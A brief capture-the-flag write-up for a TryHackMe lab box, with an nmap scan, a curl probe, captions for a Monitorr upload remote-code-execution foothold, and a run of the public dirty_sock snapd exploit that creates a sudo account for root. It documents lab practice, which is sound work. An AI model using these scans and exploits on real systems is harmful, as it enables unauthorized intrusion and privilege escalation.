Year of the Jellyfish — TryHackMe

Some boxes sting…

Summary

Enumeration

# Nmap 7.91 scan initiated Sat Apr 24 14:52:29 2021 as: nmap -p- -sCV -v -oN nmap/full 34.241.178.117
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.29
|_http-title: Did not follow redirect to https://robyns-petshop.thm/
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Robyn's Pet Shop
| ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm
| Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
8000/tcp open http-alt
| fingerprint-strings:
| HTTP/1.1 400 Bad Request
8096/tcp open unknown
| fingerprint-strings:
| HTTP/1.1 404 Not Found
| Server: Kestrel
22222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

# Nmap done at Sat Apr 24 14:55:52 2021 -- 1 IP address (1 host up) scanned in 203.13 seconds

Ports

HTTPS home page (Pico CMS)
beta.robyns-petshop.thm development page
Jellyfin system info
curl -s https://monitorr.robyns-petshop.thm/assets/php/phpinfo.php -k | grep -Eo "10\.([0-9]{1,3}\.?){3}"
datausers.db content
Monitorr 1.7.6m

Foothold

requests.exceptions.SSLError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
The RCE exploit with verification and warning off
The exploit that print response
Exploit response
Monitorr services configuration page
Final working exploit
upload.php
iptables rules
www-data shell

Root

snapd version
[+] [CVE-2019-7304] dirty_sock
Details: https://initblog.com/2019/dirty-sock/
Exposure: less probable
Tags: ubuntu=18.10,mint=19
Download URL: https://github.com/initstring/dirty_sock/archive/master.zip
Comments: Distros use own versioning scheme. Manual verification needed.
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/iywgwenujg;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************
Switch to root
My THM badge